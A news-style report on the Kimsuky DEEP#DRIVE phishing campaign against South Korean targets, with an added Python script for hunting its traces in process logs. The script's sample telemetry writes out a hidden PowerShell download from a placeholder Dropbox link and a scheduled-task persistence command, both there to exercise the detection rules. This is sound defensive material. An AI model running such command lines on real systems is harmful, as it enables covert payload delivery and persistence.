A threat actor affiliated with the North Korean government has been implicated in an ongoing campaign targeting businesses, government entities, and cryptocurrency organizations in South Korea.
The campaign, code-named DEEP#DRIVE by Securonix, has been attributed to the Kimsuky hacking group, also known as APT43, Black Banshee, Emerald Sleet, Sparkling Pisces, Springtail, TA427, and Velvet Chollima.
Security researchers Den Iuzvyk and Tim Peck noted that the attackers utilize tailored phishing lures written in Korean and disguised as legitimate documents to infiltrate targeted environments, describing the operation as “sophisticated and multi-stage.”
The decoy documents, sent via phishing emails as .HWP, .XLSX, and .PPTX files, are designed to appear as work logs, insurance documents, and crypto-related files, tricking recipients into opening them and initiating the infection process.
The attack chain relies heavily on PowerShell scripts at various stages, including payload delivery, reconnaissance, and execution. It also utilizes Dropbox for payload distribution and data exfiltration.
The attack begins with a ZIP archive containing a single Windows shortcut (.LNK) file that masquerades as a legitimate document. When extracted and launched, it triggers the execution of PowerShell code to retrieve and display a lure document hosted on Dropbox, while establishing persistence on the Windows host via a scheduled task named “ChromeUpdateTaskMachine.”
An example of a lure document, written in Korean, pertains to a safety work plan for forklift operations at a logistics facility. It outlines safe handling procedures for heavy cargo and compliance with workplace safety standards.
The PowerShell script contacts the same Dropbox location to fetch another PowerShell script responsible for gathering and exfiltrating system information. It also drops a third PowerShell script that executes an unknown .NET assembly.
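The chain above leaves two host-side traces a defender can hunt for: Explorer (the usual parent when a user double-clicks a .LNK) spawning PowerShell that reaches out to Dropbox, and a scheduled task named "ChromeUpdateTaskMachine" being created for persistence. The following script is an added example, not code from the article or from Securonix. It runs over constructed, Sysmon-style process-creation records (the hostnames, file paths and command lines are invented for illustration), and it generalizes the second indicator beyond the single task name the article reports: any newly created task whose name imitates a Chrome or Google updater but whose action launches a script interpreter is flagged as well.

```python
"""
Hunting example for the DEEP#DRIVE chain described above.
Added illustration: the record format, hostnames, paths and command lines
below are constructed assumptions, not data from the report.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Flattened process-creation record (Sysmon Event ID 1 style)."""
    host: str
    parent_image: str
    image: str
    cmdline: str


# Constructed sample telemetry. Event 0 and 1 model the infection chain;
# events 2-4 are benign look-alikes that the rules must not flag.
SAMPLE_EVENTS = [
    ProcEvent("WS-01", r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -w hidden -c "iwr https://www.dropbox.com/scl/fi/EXAMPLE/lure.hwp?dl=1 -OutFile $env:TEMP\lure.hwp"'),
    ProcEvent("WS-01", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\schtasks.exe",
              r'schtasks /create /tn "ChromeUpdateTaskMachine" /sc minute /mo 30 /tr "powershell.exe -w hidden -File C:\Users\Public\up.ps1" /f'),
    ProcEvent("WS-02", r"C:\Windows\explorer.exe",
              r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              r'"chrome.exe" --profile-directory=Default'),
    ProcEvent("WS-03", r"C:\Program Files\Google\Update\GoogleUpdate.exe",
              r"C:\Windows\System32\schtasks.exe",
              r'schtasks /query /tn "GoogleUpdateTaskMachineUA"'),
    ProcEvent("WS-04", r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\schtasks.exe",
              r'schtasks /create /tn "BackupNightly" /sc daily /tr "powershell.exe -File C:\scripts\backup.ps1"'),
]

# Dropbox download hosts seen in URLs (www.dropbox.com, dl.dropboxusercontent.com, ...).
DROPBOX_URL_RE = re.compile(r"https?://(?:[\w-]+\.)?dropbox(?:usercontent)?\.com/", re.I)
# Task name reported in the article for this campaign.
KNOWN_BAD_TASK_NAMES = {"chromeupdatetaskmachine"}
INTERPRETER_RE = re.compile(r"powershell|pwsh|cmd\.exe|wscript|cscript|mshta|rundll32", re.I)


def _is_powershell(image: str) -> bool:
    return image.lower().endswith(("powershell.exe", "pwsh.exe"))


def check_lnk_launched_powershell(ev: ProcEvent) -> bool:
    """Explorer spawning PowerShell whose command line fetches from Dropbox.
    This is how a double-clicked .LNK with an embedded PowerShell command
    appears in process telemetry."""
    return (ev.parent_image.lower().endswith("explorer.exe")
            and _is_powershell(ev.image)
            and DROPBOX_URL_RE.search(ev.cmdline) is not None)


def check_task_persistence(ev: ProcEvent) -> bool:
    """schtasks /create of the reported task name, or of any task that poses as a
    Chrome/Google updater while its action runs a script interpreter."""
    if not ev.image.lower().endswith("schtasks.exe"):
        return False
    cmd = ev.cmdline
    if not re.search(r"/create\b", cmd, re.I):
        return False
    name = re.search(r'/tn\s+"?([^"\s]+)"?', cmd, re.I)
    if not name:
        return False
    task = name.group(1).lower()
    if task in KNOWN_BAD_TASK_NAMES:
        return True
    action = re.search(r'/tr\s+"([^"]*)"', cmd, re.I)
    looks_like_updater = "update" in task and ("chrome" in task or "google" in task)
    runs_interpreter = action is not None and INTERPRETER_RE.search(action.group(1)) is not None
    return looks_like_updater and runs_interpreter


def hunt(events):
    """Return (host, rule) pairs for every record that trips a rule."""
    findings = []
    for ev in events:
        if check_lnk_launched_powershell(ev):
            findings.append((ev.host, "lnk_powershell_dropbox"))
        if check_task_persistence(ev):
            findings.append((ev.host, "scheduled_task_persistence"))
    return findings


if __name__ == "__main__":
    for host, rule in hunt(SAMPLE_EVENTS):
        print(f"{host}: {rule}")
```

The Dropbox rule is deliberately narrow (Explorer as parent, a Dropbox URL in the command line) because PowerShell pulling from Dropbox is common in legitimate automation; pairing it with the user-driven parent process and correlating both findings on the same host, as the sample output does for WS-01, is what raises confidence. Since the article notes that the Dropbox links were removed quickly after the initial stages, the process record is often the only durable artifact of the first stage, which is why the rules work on command lines rather than on network reachability.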
According to the researchers, “The use of OAuth token-based authentication for Dropbox API interactions allowed seamless exfiltration of reconnaissance data, such as system information and active processes, to predetermined folders.”
“This cloud-based infrastructure demonstrates an effective yet stealthy method of hosting and retrieving payloads, bypassing traditional IP or domain blocklists. The infrastructure appeared dynamic and short-lived, as evidenced by the rapid removal of key links after initial stages of the attack. This tactic complicates analysis and suggests the attackers actively monitor their campaigns for operational security.”
Securonix leveraged the OAuth tokens to gain additional insights into the threat actor’s infrastructure and found evidence that the campaign may have been underway since September last year.
“Despite the missing final stage, the analysis highlights the sophisticated techniques employed, including obfuscation, stealthy execution, and dynamic file processing, which demonstrate the attacker’s intent to evade detection and complicate incident response,” the researchers concluded.